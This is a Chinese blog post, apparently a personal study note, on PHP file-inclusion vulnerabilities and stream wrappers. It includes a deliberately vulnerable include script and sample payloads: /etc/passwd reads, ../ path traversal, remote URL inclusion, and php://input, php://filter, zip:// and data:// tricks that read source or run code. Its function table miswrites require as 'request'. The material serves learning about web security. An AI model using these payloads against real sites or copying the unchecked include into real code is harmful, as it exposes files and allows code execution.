0x00 基础

函数:$file=<filepath|url|伪协议>

函数	概况
`highlight_file`($file)	高亮输出代码
`show_source`($file)	同上
`file`($file)	把整个文件读入一个数组
`file_get_contents`($file)	把整个文件读入一个字符串
`fopen`($file,$mode)	打开一个文件，搭配fread()和fgets()使用
`readfile`($file)	读取并输出文件内容(不输出php代码)并返回字节数
`include`($file)	在包含的过程中如果出现错误，会抛出一个警告，程序继续正常运行
`include_once`($file)	只包含一次,其它同上
`request`($file)	在包含的过程中如果出现错误，会直接报错并退出程序的执行
`request_once`($file)	只包含一次,其它同上

php配置文件:php.ini

allow_url_fopen=:允许获取远程url文件信息(不能获取https协议信息)
allow_url_include=:允许包含远程url和部分伪协议

0x01 文件包含

#include.php
<?php
highlight_file('include.php');
$file=$_GET['file'];
if (!isset($file)){
    header('location:include.php?file=echo.php');
}
else 
    include($file);
    //$post=file_get_contents($file);
    //eval($post);

#echo.php
<?php echo '<br> 123456 </br>';
#phpinfo.php
<?php phpinfo();

本地文件包含

url?file=/etc/passwd
<?php
include('/etc/passwd')  //读取重要文件

远程文件包含(allow_url_fopen=1&allow_url_include=1)

url?file=https://www.geekyang.top/test.php
<?php
include('https://www.geekyang.top/test.php')  //运行test.php

url?file=../../../etc/passwd
<?php
$a=$_GET['a'];
include('/var/www/html/'.$a); //越权读取文件<url>?a=../../../etc/passwd

0x02 伪协议

file://(fopen=0&include=0)访问本地文件系统(绝对路径)

url?file=///etc/passwd
<?php
include('file:///etc/passwd') //读取本地文件

zip:// (fopen=0&include=0)获取压缩文件的内容并当作php运行

//绝对路径 压缩包格式任意
url?file=zip://D:\phpstudy_pro\WWW\include\phpinfo.zip\phpinfo.txt
<?php
$a=file_get_contents('zip://D:\phpstudy_pro\WWW\include\phpinfo.zip\phpinfo.txt');

php://input(fopen=0&include=1)获取传入的post数据并运行

url?file=php://input  //post phpinfo()
<?php
$a=file_get_contents('php://input');

php://filter(fopen=0&include=0)base64编码读取源代码

url?file=php://filter/read=convert.base64-encode/resource=echo.php
<?php 
include('php://filter/read=convert.base64-encode/resource=test.php');

data://(fopen=1&include=1)传输数据

data://text/plain,<php>
include('data://text/plain,<?php phpinfo();');//传输php代码数据并运行
<url>?file=data://text/plain,<?php phpinfo();

data://text/plain;base64,<base64_php>
include('data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==');//解码base64传输数据
<url>?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==

cyber http linux markdown math mysql php python tool

cyber

MysqlReadWriteVul

php黑魔法(弱语法)

SQLInjection

伪协议与文件包含

edusrc

Fileupload

http

httptool

linux

folder

linuxtool

markdown

markdown数学表达式

math

不定积分

无穷级数

mysql

MysqlReadWriteVul

Mysql

php

php黑魔法(弱语法)

SQLInjection

伪协议与文件包含

Fileupload

前后端分离

python

spiderMoudle

Class&&Object

PyFunction

PyThread

RegularExpression

tool

Git

linuxtool

Msfconsole

Sqlmap

httptool

Nmap

我听别人说这世界上有一种鸟是没有脚的，它只能够一直的飞呀飞呀，飞累了就在风里面睡觉，这种鸟一辈子只能下地一次，那一次就是它死亡的时候。

Zhangzhiyang的 ❤️ 博客

Petal 🌺 ➡️ 豆瓣 FM 桌面版
hugo-theme-dream 🌱 ➡️ HUGO 的博客主题，当然，也是你现在看到的博客主题
Alfred-Colors-workflow ➡️ Alfred 插件：CSS 颜色格式转换 hex <=> rgb <=> hsl
github-colorful-contributions-graph ➡️ 改变 GitHub 贡献面板颜色的 Chrome 插件
day.dart ➡️ ⏰ Day.js in dart.

等等等等

如果你喜欢我的开源项目或者它们可以给你带来帮助，可以赏一杯咖啡 ☕ 给我。~

If you like my open source projects or they can help you. You can buy me a coffee ☕.~

PayPal

https://paypal.me/g1eny0ung

Patreon

Become a Patron!

微信赞赏码

wechat

最好附加一下信息或者留言，方便我可以将捐助记录 📝 下来，十分感谢 🙏。

It is better to attach some information or leave a message so that I can record the donation 📝, thank you very much 🙏.

伪协议与文件包含
@ Zhang zhiyang · Tuesday, Aug 13, 2019 · 2 minute read · Update at Tuesday, Aug 13, 2019

0x00 基础

函数:$file=<filepath|url|伪协议>

php配置文件:php.ini

0x01 文件包含

0x02 伪协议

日程

我的一些开源项目

其他

Social Links